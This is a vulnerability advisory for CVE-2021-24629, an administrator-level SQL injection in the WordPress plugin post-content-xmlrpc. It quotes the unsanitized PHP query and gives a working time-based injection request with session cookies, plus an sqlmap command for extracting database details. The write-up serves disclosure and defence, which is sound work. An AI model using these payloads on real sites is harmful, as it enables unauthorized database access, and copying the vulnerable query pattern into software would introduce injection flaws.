Wp Plugin Post Content Xmlrpc

Plugin Details

Plugin Name: wp-plugin : post-content-xmlrpc
Effected Version : 1 (and most probably lower version's if any)
Vulnerability : Injection
Minimum Level of Access Required : Administrator
CVE Number : CVE-2021-24629
Identified by : Shreya Pohekar
WPScan Reference URL

Disclosure Timeline

Technical Details

The edit site functionality takes in GET parameter id that is inserted into the SQL statement without proper sanitization, escaping or validation therefore leading to SQL Injection.

Vulnerable Code: list_sites.php#L103

101:            $id=$_GET['id'];
102:            $table=$wpdb->prefix."pcx";
103:            $results_edit=$wpdb->get_row("SELECT * FROM ".$table." WHERE id = ".$id)

PoC Screenshot

post-content-xmlrpc-poc

Exploit

GET /wp-admin/admin.php?page=pcx_add_sites&mode=add&id=1 AND (SELECT 7953 FROM (SELECT(SLEEP(5)))AgUn) HTTP/1.1
Host: 172.28.128.50
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://172.28.128.50/wp-admin/admin.php?page=pcx_add_sites
Connection: close
Cookie: wordpress_232395f24f6cff47569f2739c21385d6=admin%7C1623236102%7ChOW4clIDPdi4TBOZiMszSHPdlMTwjn5Ct1f3LKhuUkr%7Cd369b0fc734febbd56e02a2729ea1e89ed8bdef88858aa2bf66244e80af40313; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_232395f24f6cff47569f2739c21385d6=admin%7C1623236102%7ChOW4clIDPdi4TBOZiMszSHPdlMTwjn5Ct1f3LKhuUkr%7C52b09dc0a0cd88faff03e9a9bce98b1cace6dcf841b17fe668c52d49083ff760; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse%26posts_list_mode%3Dlist%26mfold%3Do%26widgets_access%3Doff; wp-settings-time-1=1623063303
Upgrade-Insecure-Requests: 1

SQLMap Command

sqlmap -r post-content-xmlrpc.req --dbms mysql --current-user --current-db -b -p id --batch --flush-session